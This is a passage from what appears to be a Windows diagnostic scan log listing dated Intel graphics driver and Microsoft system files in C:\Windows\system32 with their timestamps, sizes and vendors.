2009-01-12 03:01 - 2008-09-01 22:56 - 000258048 _____ (Intel Corporation) C:\Windows\system32\igfxTMM.dll
2009-01-12 03:01 - 2008-09-01 22:55 - 000217088 _____ (Intel Corporation) C:\Windows\system32\igfxpph.dll
2009-01-12 03:01 - 2008-09-01 22:55 - 000135168 _____ (Intel Corporation) C:\Windows\system32\igfxdo.dll
2009-01-12 03:01 - 2008-09-01 22:55 - 000126976 _____ (Intel Corporation) C:\Windows\system32\igfxcpl.cpl
2009-01-12 03:01 - 2008-09-01 22:55 - 000069632 _____ (Intel Corporation) C:\Windows\system32\oemdspif.dll
2009-01-12 03:01 - 2008-09-01 22:55 - 000052224 _____ (Intel Corporation) C:\Windows\system32\igfxsrvc.dll
2009-01-12 03:01 - 2008-09-01 22:55 - 000024576 _____ (Intel Corporation) C:\Windows\system32\igfxexps.dll
2009-01-12 03:01 - 2008-09-01 22:54 - 005672960 _____ (Intel Corporation) C:\Windows\system32\igfxress.dll
2009-01-12 03:01 - 2008-09-01 22:54 - 000249856 _____ (Intel Corporation) C:\Windows\system32\igfxrenu.lrc
2009-01-12 03:01 - 2008-09-01 22:54 - 000221184 _____ (Intel Corporation) C:\Windows\system32\igfxdev.dll
2009-01-12 03:01 - 2008-09-01 22:54 - 000106496 _____ (Intel Corporation) C:\Windows\system32\hccutils.dll
2009-01-12 03:01 - 2008-09-01 22:49 - 000002096 _____ C:\Windows\system32\iglhxo32.vp
2009-01-12 03:01 - 2008-09-01 22:49 - 000002096 _____ C:\Windows\system32\iglhxc32.vp
2008-02-01 03:21 - 2008-02-01 03:21 - 000245408 _____ (Microsoft Corporation) C:\Windows\system32\unicows.dll
2008-01-20 21:13 - 2008-01-20 20:23 - 000006656 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\errdev.sys
2008-01-20 21:11 - 2008-01-20 20:23 - 000045568 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\blbdrive.sys
2008-01-20 21:10 - 2008-01-20 20:23 - 000386616 _____ (LSI Corporation, Inc.) C:\Windows\system32\Drivers\MegaSR.sys
2008-01-20 20:25 - 2008-01-20 20:25 - 001642496 _____ (Microsoft Corporation) C:\Windows\system32\WMPEncEn.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 001329152 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOE.DLL
2008-01-20 20:25 - 2008-01-20 20:25 - 001118720 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOE.DLL
2008-01-20 20:25 - 2008-01-20 20:25 - 000767488 _____ (Microsoft Corporation) C:\Windows\system32\WMVSENCD.DLL
2008-01-20 20:25 - 2008-01-20 20:25 - 000758784 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOD.DLL
2008-01-20 20:25 - 2008-01-20 20:25 - 000705536 _____ (Microsoft Corporation) C:\Windows\system32\imagesp1.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000616448 _____ (Microsoft Corporation) C:\Windows\system32\dsuiext.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000614400 _____ (Microsoft Corporation) C:\Windows\system32\MFWMAAEC.DLL
2008-01-20 20:25 - 2008-01-20 20:25 - 000464896 _____ (Microsoft Corporation) C:\Windows\system32\msra.exe
2008-01-20 20:25 - 2008-01-20 20:25 - 000418304 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmdev.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000415232 _____ (Microsoft Corporation) C:\Windows\system32\msdri.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000403968 _____ (Microsoft Corporation) C:\Windows\system32\p2pcollab.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000394240 _____ (Microsoft Corporation) C:\Windows\system32\dsquery.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000347648 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmnet.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000337408 _____ (Microsoft Corporation) C:\Windows\system32\tracerpt.exe
2008-01-20 20:25 - 2008-01-20 20:25 - 000318464 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2008-01-20 20:25 - 2008-01-20 20:25 - 000317440 _____ (Microsoft Corporation) C:\Windows\system32\azroleui.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000312320 _____ (Microsoft Corporation) C:\Windows\system32\mswmdm.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000296960 _____ (Microsoft Corporation) C:\Windows\system32\Wpc.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000296960 _____ (Microsoft Corporation) C:\Windows\system32\ntshrui.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000274944 _____ (Microsoft Corporation) C:\Windows\system32\srrstr.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000259584 _____ (Microsoft Corporation) C:\Windows\system32\MPG4DECD.DLL
2008-01-20 20:25 - 2008-01-20 20:25 - 000259584 _____ (Microsoft Corporation) C:\Windows\system32\MP43DECD.DLL
2008-01-20 20:25 - 2008-01-20 20:25 - 000246272 _____ (Microsoft Corporation) C:\Windows\system32\VIDRESZR.DLL
2008-01-20 20:25 - 2008-01-20 20:25 - 000244224 _____ (Microsoft Corporation) C:\Windows\system32\audiodev.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000223232 _____ (Microsoft Corporation) C:\Windows\system32\WMASF.DLL
2008-01-20 20:25 - 2008-01-20 20:25 - 000216576 _____ (Microsoft Corporation) C:\Windows\system32\RESAMPLEDMO.DLL
2008-01-20 20:25 - 2008-01-20 20:25 - 000208896 _____ (Microsoft Corporation) C:\Windows\system32\qasf.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000203776 _____ (Microsoft Corporation) C:\Windows\system32\wpdwcn.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000202240 _____ (Microsoft Corporation) C:\Windows\system32\P2P.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000192000 _____ (Microsoft Corporation) C:\Windows\system32\p2phost.exe
2008-01-20 20:25 - 2008-01-20 20:25 - 000188928 _____ (Microsoft Corporation) C:\Windows\system32\lltdsvc.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000185856 _____ (Microsoft Corporation) C:\Windows\system32\adsldp.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000184320 _____ (Microsoft Corporation) C:\Windows\system32\wmpsrcwp.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000183808 _____ (Microsoft Corporation) C:\Windows\system32\duser.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000161792 _____ (Microsoft Corporation) C:\Windows\system32\raserver.exe
2008-01-20 20:25 - 2008-01-20 20:25 - 000161280 _____ (Microsoft Corporation) C:\Windows\system32\COLORCNV.DLL
2008-01-20 20:25 - 2008-01-20 20:25 - 000160256 _____ (Microsoft Corporation) C:\Windows\system32\msrdc.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000154624 _____ (Microsoft Corporation) C:\Windows\system32\wmidx.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000154624 _____ (Microsoft Corporation) C:\Windows\system32\nlmgp.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000153600 _____ (Microsoft Corporation) C:\Windows\system32\wmvdspa.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000151552 _____ (Microsoft Corporation) C:\Windows\system32\rgb9rast.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000134144 _____ (Microsoft Corporation) C:\Windows\system32\p2pnetsh.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000124928 _____ (Microsoft Corporation) C:\Windows\system32\PortableDeviceWiaCompat.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000116736 _____ (Microsoft Corporation) C:\Windows\system32\sstpsvc.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000113664 _____ (Microsoft Corporation) C:\Windows\system32\loadperf.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000101376 _____ (Microsoft Corporation) C:\Windows\system32\wmpshell.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000084480 _____ (Microsoft Corporation) C:\Windows\system32\MP3DMOD.DLL
2008-01-20 20:25 - 2008-01-20 20:25 - 000082944 _____ (Microsoft Corporation) C:\Windows\system32\sdchange.exe
2008-01-20 20:25 - 2008-01-20 20:25 - 000076288 _____ (Microsoft Corporation) C:\Windows\system32\systeminfo.exe
2008-01-20 20:25 - 2008-01-20 20:25 - 000074240 _____ (Microsoft Corporation) C:\Windows\system32\nci.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000072192 _____ (Microsoft Corporation) C:\Windows\system32\wpclsp.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000067584 _____ (Microsoft Corporation) C:\Windows\system32\cmifw.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\pnrpnsp.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\mfvdsp.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000057344 _____ (Microsoft Corporation) C:\Windows\system32\eapsvc.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000056320 _____ (Microsoft Corporation) C:\Windows\system32\uexfat.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000053760 _____ (Microsoft Corporation) C:\Windows\system32\Mcx2Svc.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000053760 _____ (Microsoft Corporation) C:\Windows\system32\DfsShlEx.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000051712 _____ (Microsoft) C:\Windows\system32\esrb.rs
2008-01-20 20:25 - 2008-01-20 20:25 - 000050688 _____ (Microsoft Corporation) C:\Windows\system32\fphc.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\dssec.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000040960 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000040448 _____ (Microsoft Corporation) C:\Windows\system32\lodctr.exe
2008-01-20 20:25 - 2008-01-20 20:25 - 000039424 _____ (Microsoft Corporation) C:\Windows\system32\wpnpinst.exe
2008-01-20 20:25 - 2008-01-20 20:25 - 000037888 _____ (Microsoft Corporation) C:\Windows\system32\vds_ps.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000033792 _____ (Microsoft Corporation) C:\Windows\system32\unlodctr.exe
2008-01-20 20:25 - 2008-01-20 20:25 - 000031232 _____ (Microsoft Corporation) C:\Windows\system32\lltdapi.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\msdmo.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000024064 _____ (Microsoft Corporation) C:\Windows\system32\srwmi.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000022016 _____ (Microsoft Corporation) C:\Windows\system32\wmpcm.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000021504 _____ (Microsoft Corporation) C:\Windows\system32\HotStartUserAgent.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000020992 _____ (Microsoft Corporation) C:\Windows\system32\msdtcVSp1res.dll
2008-01-20 20:25 - 2008-01-20 20:25 - 000019968 _____ (Microsoft Corporation) C:\Windows\system32\vdsldr.exe
2008-01-20 20:25 - 2008-01-20 20:25 - 000016896 _____ (Microsoft) C:\Windows\system32\grb.rs
2008-01-20 20:25 - 2008-01-20 20:25 - 000014848 _____ (Microsoft Corporation) C:\Windows\system32\srdelayed.exe
2008-01-20 20:25 - 2008-01-20 20:25 - 000007680 _____ (Microsoft Corporation) C:\Windows\system32\procinst.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 008322048 _____ (Microsoft Corporation) C:\Windows\system32\spwizimg.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 005714432 _____ (Microsoft Corporation) C:\Windows\system32\logon.scr
2008-01-20 20:24 - 2008-01-20 20:24 - 004595712 _____ (Microsoft Corporation) C:\Windows\system32\AuthFWSnapin.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 003104768 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0049.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 003104768 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0047.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 003104768 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0046.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 003104768 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0045.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 003104768 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0039.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 003104768 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0020.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 002585088 _____ (Microsoft Corporation) C:\Windows\system32\FirewallControlPanel.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 002249216 _____ (Microsoft Corporation) C:\Windows\system32\Firewall.cpl
2008-01-20 20:24 - 2008-01-20 20:24 - 001966592 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0027.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 001965056 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0026.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 001965056 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0024.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 001801216 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0022.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 001801216 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0021.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 001502208 _____ (Microsoft Corporation) C:\Windows\system32\pla.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 001405952 _____ (Microsoft Corporation) C:\Windows\system32\ActiveContentWizard.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 001386496 _____ (Microsoft Corporation) C:\Windows\system32\msvbvm60.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 001295360 _____ (Microsoft Corporation) C:\Windows\system32\wsecedit.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 001291264 _____ (Microsoft Corporation) C:\Windows\system32\comres.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 001107456 _____ (Microsoft Corporation) C:\Windows\system32\ogldrv.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 001039360 _____ (Microsoft Corporation) C:\Windows\system32\d3d8.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000975360 _____ (Microsoft Corporation) C:\Windows\system32\RASMM.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000816128 _____ (Microsoft Corporation) C:\Windows\system32\d3dim700.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000736768 _____ (Microsoft Corporation) C:\Windows\system32\unbcl.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000686592 _____ (Microsoft Corporation) C:\Windows\system32\colorui.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000671232 _____ (Microsoft Corporation) C:\Windows\system32\dfrgui.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000604160 _____ (Microsoft Corporation) C:\Windows\system32\sqlceqp30.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000574976 _____ (Microsoft Corporation) C:\Windows\system32\XPSSHHDR.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000523776 _____ (Microsoft Corporation) C:\Windows\system32\hhctrl.ocx
2008-01-20 20:24 - 2008-01-20 20:24 - 000523776 _____ (Microsoft Corporation) C:\Windows\system32\clbcatq.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000522752 _____ (Microsoft Corporation) C:\Windows\system32\ddraw.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000520704 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000509952 _____ (Microsoft Corporation) C:\Windows\system32\AuthFWGP.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000498176 _____ (Microsoft Corporation) C:\Windows\HelpPane.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000487936 _____ (Microsoft Corporation) C:\Windows\system32\catsrvut.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000485376 _____ (Microsoft Corporation) C:\Windows\system32\mspaint.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000456704 _____ (Microsoft Corporation) C:\Windows\system32\wvc.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000451072 _____ (Microsoft Corporation) C:\Windows\system32\catsrv.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000431104 _____ (Microsoft Corporation) C:\Windows\system32\tdh.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000429056 _____ (Microsoft Corporation) C:\Windows\system32\localsec.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000403968 _____ (Microsoft Corporation) C:\Windows\system32\FirewallAPI.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000388096 _____ (Microsoft Corporation) C:\Windows\system32\dmdlgs.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000384512 _____ (Microsoft Corporation) C:\Windows\system32\d3dim.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000376832 _____ (Microsoft Corporation) C:\Windows\system32\sxs.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000355328 _____ (Microsoft Corporation) C:\Windows\system32\termmgr.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000352256 _____ (Microsoft Corporation) C:\Windows\system32\nshipsec.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000348160 _____ (Microsoft Corporation) C:\Windows\system32\spwizeng.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000344576 _____ (Microsoft Corporation) C:\Windows\system32\msdtckrm.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000334336 _____ (Microsoft Corporation) C:\Windows\system32\bcdedit.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000326656 _____ (Microsoft Corporation) C:\Windows\system32\actxprxy.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000319488 _____ (Microsoft Corporation) C:\Windows\system32\odbcjt32.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000308224 _____ (Microsoft Corporation) C:\Windows\system32\sqlcese30.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000305152 _____ (Microsoft Corporation) C:\Windows\system32\msdelta.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000301056 _____ (Microsoft Corporation) C:\Windows\system32\mmcbase.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000300032 _____ (Microsoft Corporation) C:\Windows\system32\puiobj.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000297472 _____ (Microsoft Corporation) C:\Windows\system32\cmipnpinstall.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000296960 _____ (Microsoft Corporation) C:\Windows\system32\msieftp.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000296448 _____ (Microsoft Corporation) C:\Windows\system32\xwizards.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000289792 _____ (Microsoft Corporation) C:\Windows\system32\hnetcfg.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000288256 _____ (Microsoft Corporation) C:\Windows\system32\ipnathlp.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000282624 _____ (Microsoft Corporation) C:\Windows\system32\CompatUI.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000276480 _____ (Microsoft Corporation) C:\Windows\system32\compstui.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000275968 _____ (Microsoft Corporation) C:\Windows\system32\mcbuilder.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000274432 _____ (Microsoft Corporation) C:\Windows\system32\netman.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000272896 _____ (Microsoft Corporation) C:\Windows\system32\polstore.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000259072 _____ (Microsoft Corporation) C:\Windows\system32\upnphost.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000258560 _____ (Microsoft Corporation) C:\Windows\system32\dpx.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000257024 _____ (Microsoft Corporation) C:\Windows\system32\VAN.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000257024 _____ (Microsoft Corporation) C:\Windows\system32\adsnt.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000252416 _____ (Microsoft Corporation) C:\Windows\system32\iprtrmgr.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000251904 _____ (Microsoft Corporation) C:\Windows\system32\sti_ci.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000251904 _____ (Microsoft Corporation) C:\Windows\system32\authfwcfg.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000242688 _____ (Microsoft Corporation) C:\Windows\system32\sysdm.cpl
2008-01-20 20:24 - 2008-01-20 20:24 - 000237056 _____ (Microsoft Corporation) C:\Windows\system32\netprofm.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000235520 _____ (Microsoft Corporation) C:\Windows\system32\dot3gpui.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000229888 _____ (Microsoft Corporation) C:\Windows\system32\mycomput.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000227840 _____ (Microsoft Corporation) C:\Windows\system32\msconfig.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000226816 _____ (Microsoft Corp.) C:\Windows\system32\Defrag.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000222720 _____ (Microsoft Corporation) C:\Windows\system32\wavemsp.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000220160 _____ (Microsoft Corporation) C:\Windows\system32\comsnap.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000215040 _____ (Microsoft Corporation) C:\Windows\system32\msdtcuiu.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000215040 _____ (Microsoft Corporation) C:\Windows\system32\icm32.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000206336 _____ (Microsoft Corporation) C:\Windows\system32\mstask.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000205824 _____ (Microsoft Corporation) C:\Windows\system32\msoeacct.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000204800 _____ (Microsoft Corporation) C:\Windows\system32\activeds.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000201216 _____ (Microsoft Corporation) C:\Windows\system32\unattend.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000195584 _____ (Microsoft Corporation) C:\Windows\system32\upnp.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000191488 _____ (Microsoft Corporation) C:\Windows\system32\provthrd.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000190976 _____ (Microsoft Corporation) C:\Windows\system32\dskquoui.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000187904 _____ (Microsoft Corporation) C:\Windows\system32\mlang.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000184320 _____ (Microsoft Corporation) C:\Windows\system32\dmdskmgr.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000180224 _____ (Microsoft Corporation) C:\Windows\system32\msorcl32.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000179712 _____ (Microsoft Corporation) C:\Windows\system32\lpksetup.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000179200 _____ (Microsoft Corporation) C:\Windows\system32\ws2_32.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000179200 _____ (Microsoft Corporation) C:\Windows\system32\els.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000178176 _____ (Microsoft Corporation) C:\Windows\system32\clusapi.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000173568 _____ (Microsoft Corporation) C:\Windows\system32\dsdmo.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000172544 _____ (Microsoft Corporation) C:\Windows\system32\QAGENT.DLL
2008-01-20 20:24 - 2008-01-20 20:24 - 000171520 _____ (Microsoft Corporation) C:\Windows\system32\cic.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000167424 _____ (Microsoft Corporation) C:\Windows\system32\ActionQueue.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000163840 _____ (Microsoft Corporation) C:\Windows\system32\taskmgr.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000163840 _____ (Microsoft Corp.) C:\Windows\system32\DfrgNtfs.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000163328 _____ (Microsoft Corporation) C:\Windows\system32\powercfg.cpl
2008-01-20 20:24 - 2008-01-20 20:24 - 000160768 _____ (Microsoft Corporation) C:\Windows\system32\DpiScaling.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000159744 _____ (Microsoft Corporation) C:\Windows\system32\odbctrac.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000159744 _____ (Microsoft Corporation) C:\Windows\system32\msdadiag.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000158720 _____ (Microsoft Corporation) C:\Windows\system32\net1.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000157696 _____ (Microsoft Corporation) C:\Windows\system32\verifier.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000155704 _____ (Microsoft Corporation) C:\Windows\system32\dssenh.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000155648 _____ (Microsoft Corporation) C:\Windows\system32\ssdpsrv.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000154112 _____ (Microsoft Corporation) C:\Windows\system32\QSHVHOST.DLL
2008-01-20 20:24 - 2008-01-20 20:24 - 000153600 _____ (Microsoft Corporation) C:\Windows\system32\NAPMONTR.DLL
2008-01-20 20:24 - 2008-01-20 20:24 - 000152064 _____ (Microsoft Corporation) C:\Windows\system32\vdsbas.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000151552 _____ (Microsoft Corporation) C:\Windows\system32\schtasks.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000145455 _____ C:\Windows\system32\perfmon.msc
2008-01-20 20:24 - 2008-01-20 20:24 - 000145408 _____ (Microsoft Corporation) C:\Windows\system32\CompMgmtLauncher.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000144384 _____ (Microsoft Corporation) C:\Windows\system32\ksproxy.ax
2008-01-20 20:24 - 2008-01-20 20:24 - 000142848 _____ (Microsoft Corporation) C:\Windows\system32\dot3ui.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000140800 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000139264 _____ (Microsoft Corporation) C:\Windows\system32\SmiInstaller.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000135680 _____ (Microsoft Corporation) C:\Windows\system32\mydocs.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000135168 _____ (Microsoft Corporation) C:\Windows\system32\ndfapi.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000135168 _____ (Microsoft Corporation) C:\Windows\system32\dbnetlib.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000134656 _____ (Microsoft Corporation) C:\Windows\system32\rdpdd.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000134656 _____ (Microsoft Corporation) C:\Windows\system32\dps.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000134656 _____ (Microsoft Corporation) C:\Windows\regedit.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000131072 _____ (Microsoft Corporation) C:\Windows\system32\fde.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000130560 _____ (Microsoft Corporation) C:\Windows\system32\uudf.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000129024 _____ (Microsoft Corporation) C:\Windows\system32\McxDriv.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000128512 _____ (Microsoft Corporation) C:\Windows\system32\MdSched.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000128000 _____ (Microsoft Corporation) C:\Windows\system32\shimgvw.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000127488 _____ (Microsoft Corporation) C:\Windows\system32\mmcshext.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000127488 _____ (Microsoft Corporation) C:\Windows\system32\aclui.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000124928 _____ (Microsoft Corporation) C:\Windows\system32\mtstocom.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000124928 _____ (Microsoft Corporation) C:\Windows\system32\mprmsg.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000123392 _____ (Microsoft Corporation) C:\Windows\system32\ifsutil.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000121856 _____ (Microsoft Corporation) C:\Windows\system32\dispdiag.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000120320 _____ (Microsoft Corporation) C:\Windows\system32\perfmon.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000120320 _____ (Microsoft Corporation) C:\Windows\system32\msaatext.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000119808 _____ (Microsoft Corporation) C:\Windows\system32\netid.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000119296 _____ (Microsoft Corporation) C:\Windows\system32\prntvpt.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000118272 _____ (Microsoft Corporation) C:\Windows\system32\RDPENCDD.dll
